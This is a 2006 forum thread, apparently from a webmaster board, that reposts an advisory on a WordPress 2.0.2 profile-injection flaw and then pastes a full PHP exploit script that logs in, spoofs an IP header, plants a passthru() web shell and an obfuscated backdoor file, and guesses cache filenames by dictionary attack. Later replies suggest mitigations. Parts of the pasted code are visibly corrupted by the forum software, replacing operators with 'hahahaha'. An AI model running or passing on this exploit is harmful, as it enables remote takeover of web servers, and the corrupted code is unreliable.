Wordpress exploit details

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SmokeyTheBear
    ►SouthOfHeaven
    • Jun 2004
    • 28609

    #1

    Wordpress exploit details

    posted a thread earlier but didnt have any info to go along with it.. so heres the further details

    Advisory ID : FrSIRT/ADV-2006-1992
    CVE ID : GENERIC-MAP-NOMATCH
    Rated as : High Risk
    Remotely Exploitable : Yes
    Locally Exploitable : Yes
    Release Date : 2006-05-26

    Technical Description

    A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server.

    Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses.

    Affected Products

    WordPress version 2.0.2 and prior

    Solution

    The FrSIRT is not aware of any official supplied patch for this issue.
    hatisblack at yahoo.com
  • Jace
    FBOP Class Of 2013
    • Jan 2004
    • 35562

    #2
    wonder how long it will take to get a fix for it

    Comment

    • SmokeyTheBear
      ►SouthOfHeaven
      • Jun 2004
      • 28609

      #3
      heres how they do it

      Code:
      #!/usr/bin/php -q -d short_open_tag=on
      <?
      
      
      if ($argc<6) {
      echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS             \r\n";
      echo "host:      target server (ip/hostname)                              \r\n";
      echo "path:      path to WordPress                                        \r\n";
      echo "cmd:       a shell command                                          \r\n";
      echo "user/pass: you need a valid user account                            \r\n";
      echo "Options:                                                            \r\n";
      echo "   -D[dicrionary] specify a textfile and try dictionary attack      \r\n";
      echo "   -p[port]:        \"  a port other than 80                        \r\n";
      echo "   -P[ip:port]:     \"  a proxy                                     \r\n";
      echo "Examples:                                                           \r\n";
      echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n";
      echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n";
      echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
      die;
      }
      
      /* explaination:
      
        i) wordpress stores some user informations inside cached files
         in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are
         php files.
         Normally they look like this:
      
         <?php
         //O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"[email protected]";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}
         ?>
      
         but...what happens if you inject a carriage return ( chr(13)...), some php code and some
         escape chars when you update your profile (ex. in "displayname" argument)?
      
         Look at this file now:
      
         <?php
         //O:8:"stdClass":24:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:17:"[email protected]";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu
         error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo 56789;passthru($_REQUEST[cmd]);echo 56789;//suntzuuuuuuuuuuuuuu";s:10:"first_name";s:6:"suntzu";s:9:"last_name";s:6:"suntzu";s:8:"nickname";s:6:"suntzu";s:11:"description";s:6:"whoami";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:12:"rich_editing";s:4:"true";s:14:"user_firstname";s:6:"suntzu";s:13:"user_lastname";s:6:"suntzu";s:16:"user_description";s:6:"whoami";}
         ?>
      
         you have a backdoor on target server...
      
         Now you have to search a way to guess filenames 'cause we have an
         index.php to trivially protect folders, but... guess what?
      
         give a look at wp-includes/cache.php at line 355:
      
         ...
         $cache_file = $group_dir.md5($id.DB_PASSWORD).'.php';
         ...
      
         $group_dir is the folder where files are stored
         DB_PASSWORD costant could be empty, if so...
         you have only to calculate the md5 hash of your user id, then:
      
         http://[target]/[path]/wp-content/cache/users/[md5(user_id)].php?cmd=ls%20-la
      
         the same with userlogins/ folder, this time:
      
         http://[target]/[path]/wp-content/cache/userlogins/[md5(username)].php?cmd=ls%20-la
      
         otherwise you can check if DB_PASSWORD is in a dictionary through the -D option,
         this tool calculate the hash to do something like this:
      
         http://[target]/[path]/wp-content/cache/users/[md5([user_id][db_pass])].php?cmd=ls%20-la
         http://[target]/[path]/wp-content/cache/userloginss/[md5([username][db_pass])].php?cmd=ls%20-la
      
        ii) an ip-spoofing issue in vars.php:
      
        ...
        // On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this
        // by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address.
        if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) )
        	$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR'];
        ...
      
        poc:
        you can set an http header like this when you register:
      
        PC_REMOTE_ADDR: 1.1.1.1
      									      */
      error_reporting(0);
      ini_set("max_execution_time",0);
      ini_set("default_socket_timeout",5);
      
      function quick_dump($string)
      {
        $result='';$exa='';$cont=0;
        for ($i=0; $i<=strlen($string)-1; $i++)
        {
         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
         {$result.="  .";}
         else
         {$result.="  ".$string[$i];}
         if (strlen(dechex(ord($string[$i])))hahahaha2)
         {$exa.=" ".dechex(ord($string[$i]));}
         else
         {$exa.=" 0".dechex(ord($string[$i]));}
         $cont++;if ($conthahahaha15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
        }
       return $exa."\r\n".$result;
      }
      $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
      function sendpacketii($packet)
      {
        global $proxy, $host, $port, $html, $proxy_regex;
        if ($proxyhahahaha'') {
          $ock=fsockopen(gethostbyname($host),$port);
          if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
          }
        }
        else {
      	$c = preg_match($proxy_regex,$proxy);
          if (!$c) {
            echo 'Not a valid proxy...';die;
          }
          $parts=explode(':',$proxy);
          echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
          $ock=fsockopen($parts[0],$parts[1]);
          if (!$ock) {
            echo 'No response from proxy...';die;
      	}
        }
        fputs($ock,$packet);
        if ($proxyhahahaha'') {
          $html='';
          while (!feof($ock)) {
            $html.=fgets($ock);
          }
        }
        else {
          $html='';
          while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
            $html.=fread($ock,1);
          }
        }
        fclose($ock);
        #debug
        #echo "\r\n".$html;
      
      }
      $host=$argv[1];
      $path=$argv[2];
      $username=$argv[3];
      $password=$argv[4];
      $cmd="";
      $port=80;
      $proxy="";
      $dict="";
      
      for ($i=5; $i<=$argc-1; $i++){
      $t=$argv[$i][0].$argv[$i][1];
      if (($t<>"-p") and ($t<>"-P") and ($t<>"-D"))
      {$cmd.=" ".$argv[$i];}
      if ($thahahaha"-p")
      {
        $port=str_replace("-p","",$argv[$i]);
      }
      if ($thahahaha"-P")
      {
        $proxy=str_replace("-P","",$argv[$i]);
      }
      if ($thahahaha"-D")
      {
        $dict=str_replace("-D","",$argv[$i]);
      }
      }
      $cmd=urlencode($cmd);
      if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
      if ($proxyhahahaha'') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
      
      echo "step 0 -> check if suntzu.php is already installed...\r\n";
      $check=array("users/suntzu.php",
      	     "userlogins/suntzu.php"
      	     );
      hatisblack at yahoo.com

      Comment

      • SmokeyTheBear
        ►SouthOfHeaven
        • Jun 2004
        • 28609

        #4
        [code]
        Code:
        for ($i=0; $i<=count($check)-1; $i++)
        {
          $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Cookie: cmd=".$cmd."\r\n";
          $packet.="Connection: close\r\n\r\n";
          sendpacketii($packet);
          if (strstr($html,"*DL*"))
          {
            echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp[1]."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la";die;
          }
        }
        echo "step 1 -> Login ...\r\n";
        $data="log=".urlencode(trim($username));
        $data.="&pwd=".urlencode(trim($password));
        $data.="&rememberme=forever";
        $data.="&submit=".urlencode("Login &raquo;");
        $data.="&redirect_to=wp-admin";
        $packet="POST ".$p."wp-login.php HTTP/1.0\r\n";
        $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)...
        $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Content-Length: ".strlen($data)."\r\n";
        $packet.="Connection: close\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        $temp=explode("Set-Cookie: ",$html);
        $temp2=explode(" ",$temp[1]);
        $cookie=$temp2[0];
        $temp2=explode(" ",$temp[2]);
        $cookie.=" ".$temp2[0];
        if ($cookiehahahaha''){echo "Unable to login...";die;}
        else {echo "cookie ->".$cookie."\r\n";}
        
        echo "step 2 -> Retrieve your user id...\r\n";
        $packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n";
        $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Cookie: ".$cookie."\r\n";
        $packet.="Connection: close\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        $temp=explode("checkuser_id\" value=\"",$html);
        $temp2=explode("\"",$temp[1]);
        $user_id=$temp2[0];
        if ($user_idhahahaha''){die("Unable to retrieve user id...\r\n");}
        else {echo "user id -> ".$user_id."\r\n";}
        
        echo "step 3 -> Update your profile with the evil code...\r\n";
        $suntzu='$fp=fopen("suntzu.php","w");fputs($fp,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(114).chr(114).chr(111).chr(114).chr(95).chr(114).chr(101).chr(112).chr(111).chr(114).chr(116).chr(105).chr(110).chr(103).chr(40).chr(48).chr(41).chr(59).chr(115).chr(101).chr(116).chr(95).chr(116).chr(105).chr(109).chr(101).chr(95).chr(108).chr(105).chr(109).chr(105).chr(116).chr(40).chr(48).chr(41).chr(59).chr(105).chr(102).chr(32).chr(40).chr(103).chr(101).chr(116).chr(95).chr(109).chr(97).chr(103).chr(105).chr(99).chr(95).chr(113).chr(117).chr(111).chr(116).chr(101).chr(115).chr(95).chr(103).chr(112).chr(99).chr(40).chr(41).chr(41).chr(123).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(61).chr(115).chr(116).chr(114).chr(105).chr(112).chr(115).chr(108).chr(97).chr(115).chr(104).chr(101).chr(115).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(125).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(42).chr(68).chr(76).chr(42).chr(34).chr(59).chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62));fclose($fp);//';
        $suntzu=urlencode($suntzu);
        $code='error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo chr(42).chr(68).chr(76).chr(42);passthru($_REQUEST[cmd]);echo chr(42).chr(68).chr(76).chr(42);';
        $code=urlencode($code);
        $data="from=profile";
        $data.="&checkuser_id=".$user_id;
        $data.="&user_login=".urlencode(trim($username));
        $data.="&first_name=".urlencode(trim($username));
        $data.="&last_name=".urlencode(trim($username)).chr(13).$suntzu."//suntzuuu";
        $data.="&nickname=".urlencode(trim($username));
        $data.="&display_name=".urlencode(trim($username)).chr(13).$code."//suntzuu";
        $data.="&email=".urlencode("[email protected]");
        $data.="&url=".urlencode("http://");
        $data.="&aim=";
        $data.="&yim=";
        $data.="&jabber=";
        $data.="&description=whoami";
        $data.="&rich_editing=true";
        $data.="&submit=".urlencode("Update Profile &raquo;");
        $packet="POST ".$p."wp-admin/profile-update.php HTTP/1.0\r\n";
        $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
        $packet.="Accept-Encoding: gzip, deflate\r\n";
        $packet.="Accept-Language: en\r\n";
        $packet.="Referer: http://".$host.$path."wp-admin/profile-update.php\r\n";
        $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Content-Length: ".strlen($data)."\r\n";
        $packet.="Cookie: ".$cookie."\r\n";
        $packet.="Connection: close\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        if (eregi("updated=true",$html)){echo "Done...\r\n";}
        else {die("Unable to update profile...");}
        
        echo "step 4 -> go to profile page to avoid cached files deletion...\r\n";
        $packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n";
        $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Cookie: ".$cookie."\r\n";
        $packet.="Connection: close\r\n\r\n";
        sendpacketii($packet);
        if (eregi("200 OK",$html)){echo "Done...\r\n";}
        sleep(2);
        
        echo "step 5 -> check for an empty db password...\r\n";
        $check=array("users/".md5($user_id).".php",
        	     "userlogins/".md5(trim($username)).".php"
        	     );
        for ($i=0; $i<=count($check)-1; $i++)
        {
          $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Cookie: cmd=".$cmd."\r\n";
          $packet.="Connection: close\r\n\r\n";
          sendpacketii($packet);
          if (eregi("*DL*",$html))
          {
            echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp[1]);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die;
          }
        }
        
        if ($dicthahahaha'') {echo "exploit failed...\r\n";}
        else
           {
            echo "step 6 -> trying with dictionary attack...\r\n";
            if (file_exists($dict))
            {
              $fp=fopen($dict,"r");
              while (!feof($fp))
              {
                $word=trim(fgets($fp));
                $check=array("users/".md5($user_id.$word).".php",
        	             "userlogins/".md5(trim($username).$word).".php"
        	            );
                for ($i=0; $i<=count($check)-1; $i++)
                {
        	  echo "Trying with ".$check[$i]."\r\n";
                  $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
                  $packet.="Host: ".$host."\r\n";
                  $packet.="Cookie: cmd=".$cmd."\r\n";
                  $packet.="Connection: close\r\n\r\n";
                  sendpacketii($packet);
                  if (strstr($html,"*DL*"))
                  {
                    echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp[1];echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";
        	    die;
                  }
                }
             }
             fclose($fp);
             //if you are here...
             echo "Exploit failed...\r\n";
           }
           else
           {
             die($dict."does not exist!");
           }
          }
        ?>
        hatisblack at yahoo.com

        Comment

        • 2HousePlague
          CURATOR
          • Jul 2004
          • 14572

          #5
          Smokey be praised!





          2hp
          tada!

          Comment

          • OzMan
            Confirmed User
            • Sep 2003
            • 9162

            #6
            tank u ser

            Comment

            • 2HousePlague
              CURATOR
              • Jul 2004
              • 14572

              #7
              Smokey, she's just fer you!






              2hp
              tada!

              Comment

              • OzMan
                Confirmed User
                • Sep 2003
                • 9162

                #8
                Until a patch comes out the only thing I can think of off the top of my head would be to restrict web access to the wp-content/cache/userlogins/ and wp-content/cache/users/ directories with .htaccess.
                Last edited by OzMan; 05-26-2006, 10:09 PM.

                Comment

                • Splum
                  Confirmed User
                  • May 2003
                  • 6195

                  #9
                  Smokey where did you get this info from if you dont mind me asking

                  Comment

                  • baddog
                    So Fucking Banned
                    • Apr 2001
                    • 107089

                    #10
                    STB, I wouldn't mind talking to you on ICQ if you have a chance

                    Comment

                    • SmokeyTheBear
                      ►SouthOfHeaven
                      • Jun 2004
                      • 28609

                      #11
                      Originally posted by Splum
                      Smokey where did you get this info from if you dont mind me asking
                      frsirt....
                      hatisblack at yahoo.com

                      Comment

                      • Splum
                        Confirmed User
                        • May 2003
                        • 6195

                        #12
                        Hmm trying to exploit myself and its not working, did GFY fuck up the code or something STB?

                        Comment

                        • SmokeyTheBear
                          ►SouthOfHeaven
                          • Jun 2004
                          • 28609

                          #13
                          Originally posted by Splum
                          Hmm trying to exploit myself and its not working, did GFY fuck up the code or something STB?
                          yup it did

                          http://retrogod.altervista.org/wordpress_202_xpl.html
                          hatisblack at yahoo.com

                          Comment

                          • Splum
                            Confirmed User
                            • May 2003
                            • 6195

                            #14
                            Heh nevermind I found the exploit Good thing none of my sites RUN wordpress.

                            Comment

                            • soulboy
                              Confirmed User
                              • Apr 2004
                              • 663

                              #15
                              Thanks a lot for the information
                              500GB + 5TB BW @ $5.95 | LEarn how to generate 1 MILLION of hits | Increase your PR - Best SEO Software

                              Comment

                              • 2HousePlague
                                CURATOR
                                • Jul 2004
                                • 14572

                                #16
                                Originally posted by baddog
                                STB, I wouldn't mind talking to you on ICQ if you have a chance

                                Dogs & Bears have a long, rich history of working well together! Especially ion Japan --


                                2hp
                                tada!

                                Comment

                                • SmokeyTheBear
                                  ►SouthOfHeaven
                                  • Jun 2004
                                  • 28609

                                  #17
                                  Originally posted by 2HousePlague



                                  Dogs & Bears have a long, rich history of working well together! Especially ion Japan --


                                  2hp
                                  romans also liked them together..
                                  hatisblack at yahoo.com

                                  Comment

                                  • $5 submissions
                                    I help you SUCCEED
                                    • Nov 2003
                                    • 32195

                                    #18
                                    Good thing I don't use WP. That's raw....

                                    Comment

                                    • Chio The Pirate
                                      Confirmed User
                                      • Oct 2002
                                      • 946

                                      #19
                                      /*
                                      this works:
                                      regardless of all php.ini settings,
                                      ***********if user registration is enabled,**************
                                      against an empty or weak MySQL DB password (read explaination for details...)
                                      */

                                      Disable user registration.

                                      Need to get a site indexed in a few days? Want thousands of targeted, quality hits to your site? Want to beta test something that will revolutionize the way companies, and individuals advertise online.? Click here to take a look at Bliggo

                                      Comment

                                      • Chio The Pirate
                                        Confirmed User
                                        • Oct 2002
                                        • 946

                                        #20
                                        Should prolly rename profile.php as well in the wp-admin folder.

                                        Need to get a site indexed in a few days? Want thousands of targeted, quality hits to your site? Want to beta test something that will revolutionize the way companies, and individuals advertise online.? Click here to take a look at Bliggo

                                        Comment

                                        • mrkris
                                          Confirmed User
                                          • May 2005
                                          • 2737

                                          #21
                                          Originally posted by Chio The Pirate
                                          Disable user registration.
                                          yup, and if you don't have a db password set, then you deserve to be smacked with this exploit ...

                                          PHP-MySQL-Rails | ICQ: 342500546

                                          Comment

                                          • nico-t
                                            emperor of my world
                                            • Aug 2004
                                            • 29903

                                            #22
                                            crazy... good that i got user registartions disabled on my blogs. This means the virus cant touch me right?

                                            Comment

                                            • Corona
                                              Confirmed User
                                              • Feb 2002
                                              • 2185

                                              #23
                                              Originally posted by Splum
                                              Heh nevermind I found the exploit Good thing none of my sites RUN wordpress.
                                              It's not just WordPress that has the problem. I got it on a site that only has phpadsnew and links 2.0 on it. Other have got it from trade scritps.
                                              I was looking for a job, and then I found a job
                                              And heaven knows I'm miserable now

                                              Comment

                                              • Brujah
                                                Beer Money Baron
                                                • Jan 2001
                                                • 22157

                                                #24
                                                Block your wp-admin directory with .htaccess
                                                Deny from All
                                                Allow from your IP

                                                You really should do this anyway

                                                Comment

                                                Working...